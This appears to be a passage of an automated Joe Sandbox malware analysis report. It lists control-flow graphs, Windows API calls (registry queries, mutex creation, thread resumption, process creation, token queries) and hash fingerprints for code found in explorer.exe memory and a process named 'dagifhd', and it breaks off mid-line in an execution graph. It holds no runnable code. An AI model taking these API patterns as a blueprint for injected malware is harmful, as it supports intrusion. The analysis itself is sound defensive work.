                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteWrite
                                                        • String ID: |:|
                                                        • API String ID: 2199199414-3736120136
                                                        • Opcode ID: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                                        • Instruction ID: 2c7561992c36e0bba78d296a3cd920a12583e149bfe622b5c84c68ef455dc391
                                                        • Opcode Fuzzy Hash: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                                        • Instruction Fuzzy Hash: C0E1AA34718F484FD7A9AB6C88987AA76D1FB98311F10462ED89FC32C5DF74E9018B46

                                                        Control-flow Graph

                                                        control_flow_graph 278 2804e00-2804e49 call 2804f1c RegOpenKeyExA 281 2804ed3-2804f02 call 28052cc ObtainUserAgentString 278->281 282 2804e4f 278->282 284 2804e51-2804e93 call 2804f1c RegQueryValueExA 282->284 288 2804f03 call 28052cc 284->288 289 2804e95-2804eb4 call 28052cc call 28050dc 284->289 292 2804f08-2804f0d 288->292 289->292 298 2804eb6-2804ec7 289->298 294 2804ec9-2804eca 292->294 295 2804f0f 292->295 294->281 295->284 298->294
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AgentObtainOpenQueryStringUserValue
                                                        • String ID:
                                                        • API String ID: 2350182032-0
                                                        • Opcode ID: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                                        • Instruction ID: 3ad70815657a9b38439f47949a6d47874275e2c1b37f1bd0fcbf1cc72b18d522
                                                        • Opcode Fuzzy Hash: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                                        • Instruction Fuzzy Hash: 1331A835608A4C8FDB58EF6CDC896EA77D6FB98310B00027ADD5EC3585EF7498068B91

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 02804C90: GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                        • CreateMutexExA.KERNEL32 ref: 02801DFF
                                                        • CreateFileMappingA.KERNEL32 ref: 02801EB1
                                                        • SleepEx.KERNEL32 ref: 02801EEE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$FileInformationMappingMutexSleepVolume
                                                        • String ID:
                                                        • API String ID: 3744091137-0
                                                        • Opcode ID: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                                        • Instruction ID: 2a2f1f48cf0963bfb1c46b42febfffec9d869a6feae233277bfd22060d4a076b
                                                        • Opcode Fuzzy Hash: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                                        • Instruction Fuzzy Hash: DC418638714F088FEBA4EB78849C7AF76D2EF98716F504A2E805FD6180CF7495029B42

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreateTime
                                                        • String ID:
                                                        • API String ID: 1986686026-0
                                                        • Opcode ID: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                                        • Instruction ID: 95d17b88d091464d295adeb53da372b69cc724d3205cf8352d8ea0b0fba8d750
                                                        • Opcode Fuzzy Hash: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                                        • Instruction Fuzzy Hash: 4521363070CB484FDF64EF58988875E76E2FBDC701F10456DA84EC7245DA34DA058782

                                                        Control-flow Graph

                                                        control_flow_graph 356 2803f7c-2803fbd 357 2803fc6-280400c call 2805328 call 2805274 call 2804434 356->357 358 2803fbf-2803fc1 356->358 366 280401a-2804020 357->366 367 280400e-2804018 357->367 359 280439c-28043b7 358->359 368 2804022-2804030 366->368 367->368 370 2804036-280406d 368->370 371 280438e-280439a call 28052cc 368->371 376 2804383-2804384 370->376 377 2804073-280409e 370->377 371->359 376->371 377->376 379 28040a4-28040b9 377->379 380 28040bb-28040bd 379->380 381 280410f-2804114 379->381 382 2804117-2804150 380->382 383 28040bf-28040db call 2804f1c 380->383 381->382 389 2804350-280435d 382->389 390 2804156-280415c 382->390 387 28040f9-280410d call 2804f1c 383->387 388 28040dd-28040f4 call 2804fc8 383->388 387->382 388->387 402 280436a-280436d 389->402 403 280435f-2804365 call 28052cc 389->403 393 280417e-2804188 390->393 394 280415e-280417b 390->394 395 2804233-2804259 393->395 396 280418e-2804199 393->396 394->393 411 2804332-2804343 395->411 412 280425f-2804270 395->412 400 28041a0-280422b call 2804f1c call 2805328 call 2805384 call 2804f1c call 28043c0 call 28052cc * 3 396->400 401 280419b 396->401 400->395 401->400 406 280437a-2804380 402->406 407 280436f-2804375 call 28052cc 402->407 403->402 406->376 407->406 411->389 417 2804345-280434b call 28052cc 411->417 412->411 419 2804276-28042a1 RtlAllocateHeap 412->419 417->389 420 28042a3-28042ad 419->420 423 28042cd-28042eb 420->423 424 28042af-28042cb RtlReAllocateHeap 420->424 429 28042ed 423->429 430 28042ef-28042f4 423->430 424->423 429->430 430->420 432 28042f6-2804301 430->432 434 2804322-280432a 432->434 435 2804303-2804309 call 2805368 432->435 434->411 439 280430e-2804318 435->439 439->434
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                                        • Instruction ID: e831c251376a9d669a9f23a0b00386dcfa580c2198304f12806232654113a404
                                                        • Opcode Fuzzy Hash: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                                        • Instruction Fuzzy Hash: 8CD17238758B098FDB94EF6CD88566EB7E2FB98701F50452DE54AD3281DB74D8028B82

                                                        Control-flow Graph

                                                        control_flow_graph 444 2802cd0-2802cfe call 28032ec 447 2802f92-2802fa2 444->447 448 2802d04-2802d0f 444->448 448->447 449 2802d15-2802d17 448->449 450 2802f7d-2802f8d call 28052cc 449->450 451 2802d1d-2802d26 449->451 450->447 451->450 453 2802d2c-2802d33 451->453 453->450 454 2802d39-2802d6f call 2804d8c 453->454 454->450 459 2802d75-2802d94 call 2804518 454->459 462 2802f67-2802f78 call 28052cc * 2 459->462 463 2802d9a-2802d9b 459->463 462->450 465 2802d9d-2802dbf 463->465 469 2802f55-2802f60 465->469 470 2802dc5-2802de0 call 2804fc8 465->470 469->462 470->469 473 2802de6-2802dea 470->473 473->469 474 2802df0-2802e02 473->474 475 2802e04-2802e06 474->475 476 2802e0c-2802e31 call 2804578 474->476 475->476 477 2802f34-2802f4f SleepEx 475->477 480 2802e37-2802ee9 call 2805328 call 2802fac 476->480 481 2802f29-2802f2f call 28052cc 476->481 477->465 477->469 492 2802efa-2802f0a ResumeThread call 28052cc 480->492 493 2802eeb-2802ef3 480->493 481->477 495 2802f0f-2802f22 492->495 493->492 495->481
                                                        APIs
                                                          • Part of subcall function 028032EC: CreateFileW.KERNEL32 ref: 02803332
                                                          • Part of subcall function 028032EC: ReadFile.KERNEL32 ref: 02803379
                                                        • ResumeThread.KERNEL32 ref: 02802EFE
                                                        • SleepEx.KERNEL32 ref: 02802F43
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateReadResumeSleepThread
                                                        • String ID:
                                                        • API String ID: 3143597149-0
                                                        • Opcode ID: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                                        • Instruction ID: cb5ea7ee88fcaadd628bdc8b3c2a0676ccaa59bcc1da444653c0be176c423282
                                                        • Opcode Fuzzy Hash: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                                        • Instruction Fuzzy Hash: FD719A34308F499FD768EB28C8987AAB7D2FF98311F54452DD45EC3285DF74A8428B82

                                                        Control-flow Graph

                                                        control_flow_graph 498 28032ec-280333f CreateFileW 499 2803341-2803351 498->499 500 28033b5-28033b8 498->500 506 2803353-2803387 call 2805328 ReadFile 499->506 507 28033ac-28033ad 499->507 501 2803420-2803421 500->501 502 28033ba-28033bd 500->502 503 2803423-280343c 501->503 502->501 504 28033bf-28033e1 call 2805328 call 2804f1c 502->504 514 28033e3-2803406 504->514 515 280338f-28033a3 call 2804fc8 506->515 507->500 519 2803408-280341e call 28052cc * 2 514->519 515->507 520 28033a5-28033a6 515->520 519->503 520->507
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateRead
                                                        • String ID:
                                                        • API String ID: 3388366904-0
                                                        • Opcode ID: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                                        • Instruction ID: c79ed3cf0cade407fdfd86877ccfe32798a986688a11d3fedaa10a1780b5a8c5
                                                        • Opcode Fuzzy Hash: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                                        • Instruction Fuzzy Hash: 5B41C53871CF0D4FD798AA6C589937AB6C2FBC9311F54426E959FC3281DE24980247C2

                                                        Control-flow Graph

                                                        APIs
                                                        • GetTokenInformation.ADVAPI32 ref: 02804A94
                                                        • GetTokenInformation.ADVAPI32 ref: 02804ACB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                                        • Instruction ID: d8f9bc2e4f69188bb20dc324b55574dfc4509fc35ee3c816286350af672bd11f
                                                        • Opcode Fuzzy Hash: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                                        • Instruction Fuzzy Hash: 4B215334208B088FC754EB2CD49866AB7E2FF99311B050A6EE49AC7254CB74DC05DB42

                                                        Control-flow Graph

                                                        control_flow_graph 539 2803cd0-2803ce0 540 2803ce2-2803d04 EnumWindows SleepEx 539->540 541 2803d06-2803d14 539->541 540->540 540->541
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumSleepWindows
                                                        • String ID:
                                                        • API String ID: 498413330-0
                                                        • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                        • Instruction ID: 1463d5e46deb1595a3555ad154bed2e852597fb94a3d4e72d5661fa7ae90eeb7
                                                        • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                        • Instruction Fuzzy Hash: 34E04F345046098FFB68ABA4C4D8BB036A1EB18206F1401BADC0EDD285CB768995C720
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32 ref: 0280465C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                                        • Instruction ID: 44defb51d7f270c750abc859981a7be7908ba0bc13b15a02e5eef8d3f5e43656
                                                        • Opcode Fuzzy Hash: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                                        • Instruction Fuzzy Hash: 4C316D34708F484FCB94EF6C948875AB6E2FB9C311F504A6E944ED3295DB78D8458B82
                                                        APIs
                                                        • GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                          • Part of subcall function 02805174: CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AcquireContextCryptInformationVolume
                                                        • String ID:
                                                        • API String ID: 4059528372-0
                                                        • Opcode ID: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                                        • Instruction ID: 5ff07bd752fa8db797625aba05fd4c3e9b54ddc78cee21879b665b228ec3de38
                                                        • Opcode Fuzzy Hash: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                                        • Instruction Fuzzy Hash: 2D318E34618B4C8FD794EF2CC84879977E2FB98311F50062E984ED7264DE34D9458B82
                                                        APIs
                                                          • Part of subcall function 028019D0: RtlCreateHeap.NTDLL ref: 02801AE7
                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,02801973), ref: 028019A0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateHeapSleep
                                                        • String ID:
                                                        • API String ID: 221814145-0
                                                        • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                        • Instruction ID: 34d133c5690be3e00550cd96fe64d10bedd82614cf9b53e792362d9b8a5fd0e1
                                                        • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                        • Instruction Fuzzy Hash: BFE0481CB14A084BDBD4B77D9CCC33C61A1DBC8365F941579691DC61C5D924C8408723
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8!p
                                                        • API String ID: 0-2808226621
                                                        • Opcode ID: 03fdcee96880410df66dc40d9c15e8fcbdc7b9ac075f234a80b0d17ff23cee9c
                                                        • Instruction ID: 63ad6c61d641b577ac7d09d610fa2329a84531a6db8a500efa5e0438fac0b856
                                                        • Opcode Fuzzy Hash: 03fdcee96880410df66dc40d9c15e8fcbdc7b9ac075f234a80b0d17ff23cee9c
                                                        • Instruction Fuzzy Hash: AE1189766006049FD342BB78E810B697BE9DFCAB10F0504AAE4118F362DA61AC02CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8f73f86c43eb1476b52dd076673881944c00848d9a51be33c387f75f7f9b400
                                                        • Instruction ID: a09d2e0ac1950852939007661d3de75360b00235017ebb55897250414b5c624b
                                                        • Opcode Fuzzy Hash: f8f73f86c43eb1476b52dd076673881944c00848d9a51be33c387f75f7f9b400
                                                        • Instruction Fuzzy Hash: 6702D5307006159FCB14EF64C894A6EBBF2FFC5300B188969E515AB395DB71ED92CB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95860eca59caff9cb29f309a664b40ec138ae61a967c4dc3247932ca2a73c5e4
                                                        • Instruction ID: 57bf1dd16ce71cd9eb6c86f5b4f22d90b7c29e7c0919fe5b86023f47b9e87f7d
                                                        • Opcode Fuzzy Hash: 95860eca59caff9cb29f309a664b40ec138ae61a967c4dc3247932ca2a73c5e4
                                                        • Instruction Fuzzy Hash: D0D18234210602CFD705EF34D884B6A7BE2FF89304F648869D8169B365DBB1ED91EB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 936651086b7b14869f5642650070cdfb68c6f56c20624b74c07b25d9b4bff384
                                                        • Instruction ID: 590dced887dd47a56fe620d16c5a8719365d96747a00421d8768d362f1cebbd5
                                                        • Opcode Fuzzy Hash: 936651086b7b14869f5642650070cdfb68c6f56c20624b74c07b25d9b4bff384
                                                        • Instruction Fuzzy Hash: C2818130A1064ADFCB14DF64C8809AEBBF2FF89304F288569E555AB251D771ED92CB90
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2fbea9c1770c4a6c976683eeb1d56ff79f587b9dde0e2586b7a46299639459b
                                                        • Instruction ID: e2740040cc7df4900493f1a891a4262ad5b19a2e72e14d7053a23f7e8a35183d
                                                        • Opcode Fuzzy Hash: a2fbea9c1770c4a6c976683eeb1d56ff79f587b9dde0e2586b7a46299639459b
                                                        • Instruction Fuzzy Hash: 6C210C343016108FC749EF38C4A992D7BE2AF8A71532548A9F406CF3B2DA75EC42CB91
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c7e2b4a6bce56e414e465ba0fb893e9267c2ceb3192414f5b99a27f409e998a
                                                        • Instruction ID: 670748d2d93af561244c6ed4f92f9f555622c4d875bdc355fc6f74ca6b0cb431
                                                        • Opcode Fuzzy Hash: 9c7e2b4a6bce56e414e465ba0fb893e9267c2ceb3192414f5b99a27f409e998a
                                                        • Instruction Fuzzy Hash: 8011C431B001049FC705ABB4D85579D7BE6DF89700F0481BAE609AB354DE35AD068BA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b89107c5335178deebbbba09300a96257e2f4137a6ef1e084956c776f89365e
                                                        • Instruction ID: f77098c5dc336f3a42ff35053f7e9d66558aac73eee30c59db18be6c2cdadec0
                                                        • Opcode Fuzzy Hash: 8b89107c5335178deebbbba09300a96257e2f4137a6ef1e084956c776f89365e
                                                        • Instruction Fuzzy Hash: D3012B727006109FC3219F35E848D1E3FE4EB89B5031505A5F8429F354DA71EC618BA1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bef05b50e6c75618e670a8f6ad5ca059f6477b82d233a8678b9703d511800f31
                                                        • Instruction ID: 756e59f71e34e5ab1c8c9e4f36754862433665589fb021fd1bd114b8b0f0e81b
                                                        • Opcode Fuzzy Hash: bef05b50e6c75618e670a8f6ad5ca059f6477b82d233a8678b9703d511800f31
                                                        • Instruction Fuzzy Hash: F8F024727053101FD3092A395C546AF7BAAEFC6510308047BE419C7392DD749D0283E0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5612b41ed4593b53605564bcf1b6ef6538236e060113244ec324234c67454251
                                                        • Instruction ID: 7ce573aaf15f2c7af62e2d2b17cbeeaae4251b686d568f2b8be50041dadbf42c
                                                        • Opcode Fuzzy Hash: 5612b41ed4593b53605564bcf1b6ef6538236e060113244ec324234c67454251
                                                        • Instruction Fuzzy Hash: C0F09B35A0C34DAFC706DFF998585DA7FF9EF4A11071440EBE048D7151F63058459761
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee90235137d1624c0603975856941754a75bd3890717ac3aa42819c3fa4f131c
                                                        • Instruction ID: 63bbb7cfd1380897c2d75c227b34dcb480954c10f780146edbb3a0c7660300aa
                                                        • Opcode Fuzzy Hash: ee90235137d1624c0603975856941754a75bd3890717ac3aa42819c3fa4f131c
                                                        • Instruction Fuzzy Hash: 5AE01276A0411DAF8B04EFF9E8489DEBFEDFB48262B108467E009D3610FB7559828794
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c790925b8f732806289b3bda6150282d79e0d704636f70fd0ac3292f0b55697d
                                                        • Instruction ID: 81aead21917840096ebea07833b94a132fa6863ea8313055a3606e8df300cfe7
                                                        • Opcode Fuzzy Hash: c790925b8f732806289b3bda6150282d79e0d704636f70fd0ac3292f0b55697d
                                                        • Instruction Fuzzy Hash: 97E0C2341097809FC706AF34ED24AB03FE5AB46300B4504E5E481AF2A6D6B06C80DB59
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9c6b16b9b932f53ced3f87651e984df0d701787da2623680adf60c441f3bab8
                                                        • Instruction ID: affb8d9f9c5f510a9e6da33cbb84e6a8728ac4828f727dfd52943de63fbbfda0
                                                        • Opcode Fuzzy Hash: d9c6b16b9b932f53ced3f87651e984df0d701787da2623680adf60c441f3bab8
                                                        • Instruction Fuzzy Hash: 97D0A733A0DA555BCB0296B56C153CC3F248B12254B4C00BBD444D7192E644992483D2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.501192632.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_260000_dagifhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 450f138c7979d38efc46dea26450d1a6428ad259c7d71e289f82d63ae755c0bd
                                                        • Instruction ID: 43cefaed4142d96c65406b2f55dd056ffebc88f0935b141c573a1599154c0def
                                                        • Opcode Fuzzy Hash: 450f138c7979d38efc46dea26450d1a6428ad259c7d71e289f82d63ae755c0bd
                                                        • Instruction Fuzzy Hash: D6C08CA849E2C42FEB032B302C387503F700F8B604F8920DAD081470F3D55C04A9C33A

                                                        Execution Graph

                                                        Execution Coverage:2.5%
                                                        Dynamic/Decrypted Code Coverage:53.3%
                                                        Signature Coverage:16.2%
                                                        Total number of Nodes:587
                                                        Total number of Limit Nodes:30
                                                        execution_graph 27726 ca40e 27731 ca426 27726->27731 27735 ca4a2 27726->27735 27727 ca4cc ReadFile 27729 ca524 27727->27729 27727->27735 27728 ca469 memcpy 27728->27735 27740 ca2aa 17 API calls 27729->27740 27730 ca44a memcpy 27738 ca45d 27730->27738 27731->27728 27731->27730 27731->27735 27733 ca532 27734 ca53e memset 27733->27734 27733->27738 27734->27738 27735->27727 27735->27729 27736 ca501 27735->27736 27739 ca1c6 18 API calls 27736->27739 27739->27738 27740->27733 28441 e0e0c 22 API calls 27955 c4406 27960 c2e30 StrStrIW 27955->27960 27958 c2e30 22 API calls 27959 c443a 27958->27959 27961 c2ebc 27960->27961 27962 c2e57 27960->27962 27986 c1000 GetProcessHeap RtlAllocateHeap 27961->27986 27964 c19e5 9 API calls 27962->27964 27966 c2e68 27964->27966 27965 c2ed0 RegOpenKeyExW 27967 c2f68 27965->27967 27977 c2eee 27965->27977 27966->27961 27987 c1bc5 10 API calls 27966->27987 27970 c1011 3 API calls 27967->27970 27969 c2f50 RegEnumKeyExW 27973 c2f5e RegCloseKey 27969->27973 27969->27977 27971 c2f6f 27970->27971 27971->27958 27972 c2e75 27974 c2eb5 27972->27974 27976 c1afe 10 API calls 27972->27976 27973->27967 27978 c1011 3 API calls 27974->27978 27975 c1953 6 API calls 27975->27977 27979 c2e83 27976->27979 27977->27969 27977->27975 27980 c199d 9 API calls 27977->27980 27982 c2e30 18 API calls 27977->27982 27985 c1011 3 API calls 27977->27985 27978->27961 27981 c199d 9 API calls 27979->27981 27984 c2e91 27979->27984 27980->27977 27981->27984 27982->27977 27983 c1011 3 API calls 27983->27974 27984->27983 27985->27977 27986->27965 27987->27972 28443 cca01 _allmul _alldiv _allmul _alldiv 28335 f9000 28 API calls 28337 105401 memset memcpy memcpy memset memcpy 28445 ef21c 23 API calls 28338 c581f _alldiv _allrem _allmul 28340 e742e 25 API calls 28342 e7c28 8 API calls 28344 c482b 14 API calls 28345 fe024 84 API calls 28347 d943d 35 API calls 28350 107452 19 API calls 28452 e13ca 93 API calls 27993 c3c40 27994 
